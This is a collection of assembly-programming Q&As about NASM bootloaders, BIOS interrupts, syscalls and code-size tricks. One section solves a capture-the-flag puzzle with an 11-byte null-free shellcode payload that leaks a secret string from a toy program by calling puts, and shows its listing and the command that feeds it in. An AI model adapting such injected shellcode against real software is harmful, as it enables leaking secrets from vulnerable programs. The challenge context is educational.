Setting segment registers after ORG instruction - nasm

I am currently following a tutorial on OS development, which includes a discussion on bootloaders.
My bootloader is currently in 16-bit real mode, therefore, I am able to use the BIOS interrupts provided (e.g. VGA video interrupts, etc.).
The BIOS provides the video interrupt 0x10 (i.e. video teletype output). The video interrupt has the function 0x0E, which allows me to print a character to the screen.
Here is this basic bootloader:
org 0x7c00 ; Set program start (origin) address location at 0x7c00.
; This program is loaded by the BIOS at 0x7c00.
bits 16 ; We live in 16-bit Real Mode.
start:
jmp loader
bootmsg db "Welcome to my Operating System!", 0 ; My data string.
;-------------------------------------------------------
; Description: Print a null terminating string
;-------------------------------------------------------
print:
lodsb ; Load string byte at address DS:SI and place in AL.
; Then, increment/decrement SI as defined by the Direction Flag (DF) in FLAGS.
or al, al ; Set the zero flag - is AL zero?
jz printdone ; Check if this is the null byte
mov ah, 0eh
int 10h
jmp print
printdone:
ret
loader:
;|---------- Related to my question ----------|
xor ax, ax
mov ds, ax
mov es, ax
;|--------------------------------------------|
mov si, bootmsg
call print
cli ; Clears all interrupts.
hlt ; Halts the system.
times 510 - ($-$$) db 0 ; Make sure our bootloader is 512 bytes large.
dw 0xAA55 ; Boot signature - Byte 511 is 0xAA and Byte 512 is 0x55, indicated a bootable disk.1
As shown in the above code, I have highlighted the following three lines:
xor ax, ax
mov ds, ax
mov es, ax
According to the original source, it says the following:
Setup segments to insure they are 0. Remember that we have ORG 0x7c00. This means all addresses are based from 0x7c00:0. Because the data segments are within the same code segment, null em.
I am a bit confused. From my understanding, the org instruction tells the loader to load this program at address 0x7c00. Why don't we take this as our start address then? Meaning, our two overlapping Data and Code segments are not located at a base address of zero. The base address should be 0x7c0. Why does the author set the base address to 0x0?
mov ax, 07c0h
mov dx, ax
mov es, ax

I have been looking into the org instruction more and other documentation and I understand what is going on.
According to the NASM documentation on the org directive, short for origin:
The function of the ORG directive is to specify the origin address which NASM will assume the program begins at when it is loaded into memory. [...] NASM's ORG does exactly what the directive says: origin. Its sole function is to specify one offset which is added to all internal address references within the section.
Therefore, the NASM compiler assumes that the program will be loaded at the address specified with the origin instruction (i.e. org). The BIOS does exactly this. According to the following, once the BIOS finds a valid boot sector that contains a valid boot signature, the bootloader will be "loaded into memory at 0x0000:0x7c00 (segment 0, address 0x7c00)."
From the quote above, when the NASM documentation says "internal address references," it is referring to all references to concrete memory regions that are being used in the code (e.g. referencing a label, etc.). For example, the line in the bootloader code above: mov si, bootmsg will resolve bootmsg to 0x07c00 + offset, where the offset is determined by the position of the first byte of my string bootmsg (i.e. 'W').
With my code above, if I disassembly the bin file using the ndisasm utility I see the following:
00000000 EB2C jmp short 0x2e
00000002 57
00000003 656C
00000005 636F6D
00000008 6520746F
0000000C 206D79
0000000F 204F70
00000012 657261
00000015 7469
00000017 6E
00000018 67205379
0000001C 7374
0000001E 656D
00000020 2100
00000022 AC lodsb
00000023 08C0 or al,al
00000025 7406 jz 0x2d
00000027 B40E mov ah,0xe
00000029 CD10 int 0x10
0000002B EBF5 jmp short 0x22
0000002D C3 ret
0000002E 31C0 xor ax,ax
00000030 8ED8 mov ds,ax
00000032 8EC0 mov es,ax
00000034 BE027C mov si,0x7c02
00000037 E8E8FF call 0x22
0000003A FA cli
0000003B F4 hlt
00000... ... ...
(I removed the generated instructions from 0x00000002 to 0x00000020, because that is my bootmsg string and is representing data, not code).
As we can see from the output assembly, at the address 0x00000034, my bootmsg has been replaced with 0x7c02 (e.g. 0x7c00 + offset=0x02).
Michael Petch provided some very solid insight too. It is a common misconception to think the bootloader is loaded to 0x7c0:0x0000 (segment 0x07c0, offset 0). Although one could technically use this, it has been standardized to use the segment offset of zero instead (A good practice is to enforce CS:IP at the very start of your boot sector). As Michael has mentioned, if one wants more information, look at section 4 of the following guide on segment offset addressing.

Related

NASM ASSEMBLY - Print "Hello World"

I've created a string and turned it into an array. Looping through each index and moving to the al register so it can print out to the vga. The problem is, it prints the size of the string with no problem, but the characters in gibberish. Can you please help me figure out what the problem is in the code. It will be highly appreciated.
org 0
bits 16
section .text
global _start
_start:
mov si, msg
loop:
inc si
mov ah, 0x0e
mov al, [si]
or al, al
jz end
mov bh, 0x00
int 0x10
jmp loop
end:
jmp .done
.done:
jmp $
msg db 'Hello, world!',0xa
len equ $ - msg
TIMES 510 - ($ - $$) db 0
DW 0xAA55
bootloader code
ORG 0x7c00
BITS 16
boot:
mov ah, 0x02
mov al, 0x01
mov ch, 0x00
mov cl, 0x02
mov dh, 0x00
mov dl, 0x00
mov bx, 0x1000
mov es, bx
int 0x13
jmp 0x1000:0x00
times 510 - ($ - $$) db 0
dw 0xAA55
The bootloader
Before tackling the kernel code, let's look at the bootloader that brings the kernel in memory.
You have written a very minimalistic version of a bootloader, one that omits much of the usual stuff like setting up segment registers, but thanks to its reduced nature that's not really a problem.
What could be a problem is that you wrote mov dl, 0x00, hardcoding a zero to select the first floppy as your bootdisk. No problem if this is indeed the case, but it would be much better to just use whatever value the BIOS preloaded the DL register with. That's the ID for the disk that holds your bootloader and kernel.
What is a problem is that you load the kernel to the segmented address 0x1000:0x1000 and then later jump to the segmented address 0x1000:0x0000 which is 4096 bytes short of the kernel. You got lucky that the kernel code did run in the end, thanks to the memory between these two addresses most probably being filled with zero-bytes that (two by two) translate into the instruction add [bx+si], al. Because you omitted setting up the DS segment register, we don't know what unlucky byte got overwritten so many times. Let's hope it was not an important byte...
mov bx, 0x1000
mov es, bx
xor bx, bx <== You forgot to write this instruction!
int 0x13
jmp 0x1000:0x0000
What is a problem is that you ignore the possibility of encountering troubles when loading a sector from the disk. At the very least you should inspect the carry flag that the BIOS.ReadSector function 02h reports and if the flag is set you could abort cleanly. A more sophisticated approach would also retry a limited number of times, say 3 times.
ORG 0x7C00
BITS 16
; IN (dl)
mov dh, 0x00 ; DL is bootdrive
mov cx, 0x0002
mov bx, 0x1000
mov es, bx
xor bx, bx
mov ax, 0x0201 ; BIOS.ReadSector
int 0x13 ; -> AH CF
jc ERR
jmp 0x1000:0x0000
ERR:
cli
hlt
jmp ERR
times 510 - ($ - $$) db 0
dw 0xAA55
The kernel
After the jmp 0x1000:0x0000 instruction has brought you to the first instruction of your kernel, the CS code segment register holds the value 0x1000. None of the other segment registers did change, and since you did not setup any of them in the bootloader, we still don't know what any of them contain. However in order to retrieve the bytes from the message at msg with the mov al, [si] instruction, we need a correct value for the DS data segment register. In accordance with the ORG 0 directive, the correct value is the one we already have in CS. Just two 1-byte instructions are needed: push cs pop ds.
There's more to be said about the kernel code:
The printing loop uses a pre-increment on the pointer in the SI register. Because of this the first character of the string will not get displayed. You could compensate for this via mov si, msg - 1.
The printing loop processes a zero-terminating string. You don't need to prepare that len equate. What you do need is an explicit zero byte that terminates the string. You should not rely on that large number of zero bytes thattimes produced. In some future version of the code there might be no zero byte at all!
You (think you) have included a newline (0xa) in the string. For the BIOS.Teletype function 0Eh, this is merely a linefeed that moves down on the screen. To obtain a newline, you need to include both carriage return (13) and linefeed (10).
There's no reason for your kernel code to have the bootsector signature bytes at offset 510. Depending on how you get this code to the disk, it might be necessary to pad the code up to (a multiple of) 512, so keep times 512 - ($ - $$) db 0.
The kernel:
ORG 0
BITS 16
section .text
global _start
_start:
push cs
pop ds
mov si, msg
mov bx, 0x0007 ; DisplayPage=0, GraphicsColor=7 (White)
jmp BeginLoop
PrintLoop:
mov ah, 0x0E ; BIOS.Teletype
int 0x10
BeginLoop:
mov al, [si]
inc si
test al, al
jnz PrintLoop
cli
hlt
jmp $-2
msg db 'Hello, world!', 13, 10, 0
TIMES 512 - ($ - $$) db 0

Compact shellcode to print a 0-terminated string pointed-to by a register, given puts or printf at known absolute addresses?

Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.
EDIT: clarification: I want to print the value at the memory address of RDX. So “SUPER SECRET!”
Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.
The program is compiled with the c standard library, so I have access to the puts / printf statement. It’s running on x86 amd64.
$rax : 0x0000000000010000 → 0x0000000ac343db31
$rdx : 0x0000555555559480 → "SUPER SECRET!"
gef➤ info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤ info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.
Here is my attempt (intel syntax)
xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt
hexdump of my code
My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?
FULL DETAILS:
I am not quite sure what is useful information and what isn't.
File details:
ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped
Source code:
void main() {
char* flag = get_flag(); // I don't get access to the function details
char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
fgets(shellcode, 12, stdin);
((void (*)(char*))shellcode)(flag);
}
Disassembly of main:
gef➤ disass main
Dump of assembler code for function main:
0x00005555555551de <+0>: push rbp
0x00005555555551df <+1>: mov rbp,rsp
=> 0x00005555555551e2 <+4>: sub rsp,0x10
0x00005555555551e6 <+8>: mov eax,0x0
0x00005555555551eb <+13>: call 0x555555555185 <get_flag>
0x00005555555551f0 <+18>: mov QWORD PTR [rbp-0x8],rax
0x00005555555551f4 <+22>: mov r9d,0x0
0x00005555555551fa <+28>: mov r8d,0xffffffff
0x0000555555555200 <+34>: mov ecx,0x22
0x0000555555555205 <+39>: mov edx,0x0
0x000055555555520a <+44>: mov esi,0xc
0x000055555555520f <+49>: mov edi,0x1337
0x0000555555555214 <+54>: call 0x555555555030 <mmap#plt>
0x0000555555555219 <+59>: mov QWORD PTR [rbp-0x10],rax
0x000055555555521d <+63>: mov rax,QWORD PTR [rbp-0x10]
0x0000555555555221 <+67>: mov edx,0x7
0x0000555555555226 <+72>: mov esi,0xc
0x000055555555522b <+77>: mov rdi,rax
0x000055555555522e <+80>: call 0x555555555060 <mprotect#plt>
0x0000555555555233 <+85>: mov rdx,QWORD PTR [rip+0x2e26] # 0x555555558060 <stdin##GLIBC_2.2.5>
0x000055555555523a <+92>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555523e <+96>: mov esi,0xc
0x0000555555555243 <+101>: mov rdi,rax
0x0000555555555246 <+104>: call 0x555555555040 <fgets#plt>
0x000055555555524b <+109>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555524f <+113>: mov rdx,QWORD PTR [rbp-0x8]
0x0000555555555253 <+117>: mov rdi,rdx
0x0000555555555256 <+120>: call rax
0x0000555555555258 <+122>: nop
0x0000555555555259 <+123>: leave
0x000055555555525a <+124>: ret
Register state right before shellcode is executed:
$rax : 0x0000000000010000 → "EXPLOIT\n"
$rbx : 0x0000555555555260 → <__libc_csu_init+0> push r15
$rcx : 0x000055555555a4e8 → 0x0000000000000000
$rdx : 0x0000555555559480 → "SUPER SECRET!"
$rsp : 0x00007fffffffd940 → 0x0000000000010000 → "EXPLOIT\n"
$rbp : 0x00007fffffffd950 → 0x0000000000000000
$rsi : 0x4f4c5058
$rdi : 0x00007ffff7fa34d0 → 0x0000000000000000
$rip : 0x0000555555555253 → <main+117> mov rdi, rdx
$r8 : 0x0000000000010000 → "EXPLOIT\n"
$r9 : 0x7c
$r10 : 0x000055555555448f → "mprotect"
$r11 : 0x246
$r12 : 0x00005555555550a0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffda40 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
(This register state is a snapshot at the assembly line below)
●→ 0x555555555253 <main+117> mov rdi, rdx
0x555555555256 <main+120> call rax
Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:
Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).
This is a generalization of the code-golf trick of lea edi, [rax+1] trick to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.
The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either push needs a REX prefix (for R8..R15), and actually costs bytes if both are "non-legacy" registers.
See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.
bits 64
lea rsi, [rdi - 0x166f30]
;; add rbp, imm32 ; alternative, but that would mess up a call-preserved register so we might crash on return.
push rdx
pop rdi ; copy RDX to first arg, x86-64 SysV calling convention
jmp rsi ; tailcall puts
This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)
The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.
$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
1 bits 64
2 00000000 488DB7D090E9FF lea rsi, [rdi - 0x166f30]
3 ;; add rbp, imm32 ; we can avoid messing up any call-preserved registers
4 00000007 52 push rdx
5 00000008 5F pop rdi ; copy to first arg
6 00000009 FFE6 jmp rsi ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin # would work if the addresses in my build matched yours
My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, mmap_min_addr which mmap picks after the amusing choice of 0x1337 as a hint address, which isn't even page aligned but doesn't result in EIVAL on current Linux.)
Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.
Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.
The input is read using fgets (apparently to simulate a gets() overflow).
fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See Is it possible to read null characters correctly using fgets or gets_s?
Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.
BTW, your int 0x80 attempt is not viable: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? - you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.
Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.
push rdx
pop rsi
shr eax, 16 ; fun 3-byte way to turn 0x10000` into `1`, __NR_write 64-bit, instead of just push 1 / pop
mov edi, eax ; STDOUT_FD = __NR_write
lea edx, [rax + 13 - 1] ; 3 bytes. RDX = 13 = string length
; or mov dl, 0xff ; 2 bytes leaving garbage in rest of RDX
syscall
But this is 12 bytes, as well as hard-coding the length of the string (which was supposed to be part of the secret?).
mov dl, 0xff could make sure the length was at least 255, and actually much more in this case, if you don't mind getting reams of garbage after the string you want, until write hits an unmapped page and returns early. That would save a byte, making this 11.
(Fun fact, Linux write does not return an error when it's successfully written some bytes; instead it returns how many it did write. If you try again with buf + write_len, you would get a -EFAULT return value for passing a bad pointer to write.)

Print newline with as little code as possible with NASM

I'm learning a bit of assembly for fun and I am probably too green to know the right terminology and find the answer myself.
I want to print a newline at the end of my program.
Below works fine.
section .data
newline db 10
section .text
_end:
mov rax, 1
mov rdi, 1
mov rsi, newline
mov rdx, 1
syscall
mov rax, 60
mov rdi, 0
syscall
But I'm hoping to achieve the same result without defining the newline in .data. Is it possible to call sys_write directly with the byte you want, or must it always be done with a reference to some predefined data (which I assume is what mov rsi, newline is doing)?
In short, why can't I replace mov rsi, newline by mov rsi, 10?
You always need the data in memory to copy it to a file-descriptor. There is no system-call equivalent of C stdio fputc that takes data by value instead of by pointer.
mov rsi, newline puts a pointer into a register (with a huge mov r64, imm64 instruction). sys_write doesn't special-case size=1 and treat its void *buf arg as a char value if it's not a valid pointer.
There aren't any other system calls that would do the trick. pwrite and writev are both more complicated (taking a file offset as well as a pointer, or taking an array of pointer+length to gather the data in kernel space).
There is a lot you can do to optimize this for code-size, though. See https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code
First, putting the newline character in static storage means you need to generate a static address in a register. Your options here are:
5-bytes mov esi, imm32 (only in Linux non-PIE executables, so static addresses are link-time constants and are known to be in the low 2GiB of virtual address space and thus work as 32-bit zero-extended or sign-extended)
7-byte lea rsi, [rel newline] Works everywhere, the only good option if you can't use the 5-byte mov-immediate.
10-byte mov rsi, imm64. This works even in PIE executables (e.g. if you link with gcc -nostdlib without -static, on a distro where PIE is the default.) But only via a runtime relocation fixup, and the code-size is terrible. Compilers never use this because it's not faster than LEA.
But like I said, we can avoid static addressing entirely: Use push to put immediate data on the stack. This works even if we need zero-terminated strings, because push imm8 and push imm32 both sign-extend the immediate to 64-bit. Since ASCII uses the low half of the 0..255 range, this is equivalent to zero-extension.
Then we just need to copy RSP to RSI, because push leave RSP pointing to the data that was pushed. mov rsi, rsp would be 3 bytes because it needs a REX prefix. If you were targeting 32-bit code or the x32 ABI (32-bit pointers in long mode) you could use 2-byte mov esi, esp. But Linux puts the stack pointer at top of user virtual address space, so on x86-64 that's 0x007ff..., right at the top of the low canonical range. So truncating a pointer to stack memory to 32 bits isn't an option; we'd get -EFAULT.
But we can copy a 64-bit register with 1-byte push + 1-byte pop. (Assuming neither register needs a REX prefix to access.)
default rel ; We don't use any explicit addressing modes, but no reason to leave this out.
_start:
push 10 ; \n
push rsp
pop rsi ; 2 bytes total vs. 3 for mov rsi,rsp
push 1 ; _NR_write call number
pop rax ; 3 bytes, vs. 5 for mov edi, 1
mov edx, eax ; length = call number by coincidence
mov edi, eax ; fd = length = call number also coincidence
syscall ; write(1, "\n", 1)
mov al, 60 ; assuming write didn't return -errno, replace the low byte and keep the high zeros
;xor edi, edi ; leave rdi = 1 from write
syscall ; _exit(1)
.size: db $ - _start
xor-zeroing is the most well-known x86 peephole optimization: it saves 3 bytes of code size, and is actually more efficient than mov edi, 0. But you only asked for the smallest code to print a newline, without specifying that it had to exit with status = 0. So we can save 2 bytes by leaving that out.
Since we're just making an _exit system call, we don't need to clean up the stack from the 10 we pushed.
BTW, this will crash if the write returns an error. (e.g. redirected to /dev/full, or closed with ./newline >&-, or whatever other condition.) That would leave RAX=-something, so mov al, 60 would give us RAX=0xffff...3c. Then we'd get -ENOSYS from the invalid call number, and fall off the end of _start and decode whatever is next as instructions. (Probably zero bytes which decode with [rax] as an addressing mode. Then we'd fault with a SIGSEGV.)
objdump -d -Mintel disassembly of that code, after building with nasm -felf64 and linking with ld
0000000000401000 <_start>:
401000: 6a 0a push 0xa
401002: 54 push rsp
401003: 5e pop rsi
401004: 6a 01 push 0x1
401006: 58 pop rax
401007: 89 c2 mov edx,eax
401009: 89 c7 mov edi,eax
40100b: 0f 05 syscall
40100d: b0 3c mov al,0x3c
40100f: 0f 05 syscall
0000000000401011 <_start.size>:
401011: 11 .byte 0x11
So the total code-size is 0x11 = 17 bytes. vs. your version with 39 bytes of code + 1 byte of static data. Your first 3 mov instructions alone are 5, 5, and 10 bytes long. (Or 7 bytes long for mov rax,1 if you use YASM which doesn't optimize it to mov eax,1).
Running it:
$ strace ./newline
execve("./newline", ["./newline"], 0x7ffd4e98d3f0 /* 54 vars */) = 0
write(1, "\n", 1
) = 1
exit(1) = ?
+++ exited with 1 +++
If this was part of a larger program:
If you already have a pointer to some nearby static data in a register, you could do something like a 4-byte lea rsi, [rdx + newline-foo] (REX.W + opcode + modrm + disp8), assuming the newline-foo offset fits in a sign-extended disp8 and that RDX holds the address of foo.
Then you can have newline: db 10 in static storage after all. (Put it .rodata or .data, depending on which section you already had a pointer to).
It expects an address of the string in rsi register. Not a character or string.
mov rsi, newline loads the address of newline into rsi.

Segmentation fault movsb nasm in 64 bits linux

I'm new in asm, and trying to use some opcodes for getting my hands on it.
I'm working on linux, 64 bits, and have allways a segmentation fault when using movsb. I compile with nasm:
nasm -f elf64 test.asm
Here is the code
DEFAULT ABS
segment data
data:
texte: db 'Hello, World !!', 10, 13
len: equ $-texte
texteBis: db 'Hello, World !.', 10, 13
segment code
global main
main:
;The problem is here
mov rsi, texteBis
mov rdi, texte
mov cx, len
rep movsb
mov dx, len
mov rcx, texte
mov bx, 1
mov ax, 4
int 0x80
mov bx,0 ; exit code, 0=normal
mov ax,1 ; exit command to kernel
int 0x80 ; interrupt 80 hex, call kernel
Other question, with string (or other large db instance), should I use
mov rsi, texte
or
mov rsi, [texte]
I didn't understand which one gives the value and which one the address.
Do you also link?
ld -e main test.o -o test
Anyways, texteBis seems to be static data, in the data segment. That page is read-only and protected for writing/execution.
You should allocate a buffer (either on the stack or on the heap if you are allowed to use a runtime library).
Your problem is that you are writing to write-protected memory, i.e. the DATA section. Once your program gets loaded into the memory, the DATA section is actually on a read-only page. You have to use stack memory (or dynamically allocated memory) and use that as the destination of your string copy.
Example:
sub rsp, len ; move stack pointer down 'len' bytes
mov rsi, texteBis
mov rdi, rsp ; use address of stack pointer as dest.
xor rcx,rcx ; cx = 0
mov cx, len
rep movsb
That should fix your problem. As in C, it is important to allocate enough space or you will overwrite data on the stack.
Assigning values to registers
Another thing that I noticed is that you often write to sub-parts of registers, e.g.
mov dx, len
This is dangerous since other parts are not overwritten by this. Only the lowest 16 bit of the register are written. Say rdx, a 64 bit value was set to 0xffffffffffffffff. Then rdx would look like this after your move: 0xffffffffffff0011. The calling code probably reads rdx completely and therefore interprets a length of 0xffffffffffff0011 byte. Not what you want. Solution:
xor rdx,rdx
mov dx, len
or
mov rdx, len
Tools that might help you later
Note, gdb will help you find where your error is happening and will also give you additional information (such as register values and stack values). Excerpt:
Program received signal SIGSEGV, Segmentation fault.
0x00000000004005bb in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x00000000004005a6: sub $0x13,%rsp
0x00000000004005aa: mov -0x1c(%rip),%rsi # 0x400595
0x00000000004005b1: mov %rsp,%rdi
0x00000000004005b4: xor %cx,%cx
0x00000000004005b7: mov $0x11,%cx
=> 0x00000000004005bb: rep movsb %ds:(%rsi),%es:(%rdi)
0x00000000004005bd: mov $0x11,%dx
0x00000000004005c1: movabs $0x400584,%rcx
0x00000000004005cb: mov $0x1,%bx
0x00000000004005cf: mov $0x4,%ax
0x00000000004005d3: int $0x80
0x00000000004005d5: mov $0x0,%bx
0x00000000004005d9: mov $0x1,%ax
0x00000000004005dd: int $0x80
End of assembler dump.
(gdb) info registers rsi
rsi 0x57202c6f6c6c6548 6278066737626506568
Since nasm does not support a useful debugging format but it is often the case that you want to break on certain occasions, you can use the int3 instruction to raise a SIGTRAP at a certain point in the code:
mov eax, 10
int3 ; debugger will catch signal here
Hope that helps getting you started in assembly.
You don't need to use dynamic memory. Your data segment or section is read-only because is not an standard section and you are not defining it's attributes and by default nasm assign them as read only data sections.
Using objdump -h with you code outputs the following:
0 data 00000022 0000000000000000 0000000000000000 00000200 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 code 0000003c 0000000000000000 0000000000000000 00000230 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA
If you change the name of your segements to .data and .text the program runs perfectly and objdump outputs:
0 .data 00000022 0000000000000000 0000000000000000 00000200 2**2
CONTENTS, ALLOC, LOAD, DATA
1 .text 0000003c 0000000000000000 0000000000000000 00000230 2**4
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
Which are the correct attributes for what you intend with your sections.
To get more info on what attributes means I recommend this page:
https://www.tortall.net/projects/yasm/manual/html/objfmt-elf-section.html

Boot time program running on virtual computer without OS

For school assignment I have to write a program described below and I would really like some help on how to approach this problem. To be clear, I don't want you to solve this, I just want some guidance on how to do it.
Problem:
Write a boot time program, which will be run in a virtual computer without an operating system. The program has to print out your name and the words "ALT key is pressed" or "ALT key is not pressed" according to status of the ALT key.
Additional hints:
- the program has to be written in 16 bit mode
compiled program including its data must be less than 510 bytes in size
directive "org 0x7c00" specifies the correct address in the memory where the program is loaded
write instructions before the data
program should execute in an endless loop
there is no printf function, you will have to use interrupt 0x10
to read the state of the alt keys you can use the interrupt 0x16
to position the output of text use interrupt 0x10
binary format of the executable should be "bin" (nasm -f bin -o boot.bin code.asm)
resize the binary file to the size of a floppy disk (truncate -s 1474560 boot.bin )
mark the binary file as bootable disk: at location 0x1FE save the value 0x55 and at
location 0x1FF save value 0xAA (use hexadecimal editor, for example: ghex2)
start the virtual machine with your binary file as a floppy disk: (nice -n 19 qemu -fda boot.bin)
I suggest you read this on assembly bootloaders. Taken from that article, here is hello world -
org 7C00h
jmp short Start ;Jump over the data (the 'short' keyword makes the jmp instruction smaller)
Msg: db "Hello World! "
EndMsg:
Start: mov bx, 000Fh ;Page 0, colour attribute 15 (white) for the int 10 calls below
mov cx, 1 ;We will want to write 1 character
xor dx, dx ;Start at top left corner
mov ds, dx ;Ensure ds = 0 (to let us load the message)
cld ;Ensure direction flag is cleared (for LODSB)
Print: mov si, Msg ;Loads the address of the first byte of the message, 7C02h in this case
;PC BIOS Interrupt 10 Subfunction 2 - Set cursor position
;AH = 2
Char: mov ah, 2 ;BH = page, DH = row, DL = column
int 10h
lodsb ;Load a byte of the message into AL.
;Remember that DS is 0 and SI holds the
;offset of one of the bytes of the message.
;PC BIOS Interrupt 10 Subfunction 9 - Write character and colour
;AH = 9
mov ah, 9 ;BH = page, AL = character, BL = attribute, CX = character count
int 10h
inc dl ;Advance cursor
cmp dl, 80 ;Wrap around edge of screen if necessary
jne Skip
xor dl, dl
inc dh
cmp dh, 25 ;Wrap around bottom of screen if necessary
jne Skip
xor dh, dh
Skip: cmp si, EndMsg ;If we're not at end of message,
jne Char ;continue loading characters
jmp Print ;otherwise restart from the beginning of the message
times 0200h - 2 - ($ - $$) db 0 ;Zerofill up to 510 bytes
dw 0AA55h ;Boot Sector signature
;OPTIONAL:
;To zerofill up to the size of a standard 1.44MB, 3.5" floppy disk
;times 1474560 - ($ - $$) db 0

Resources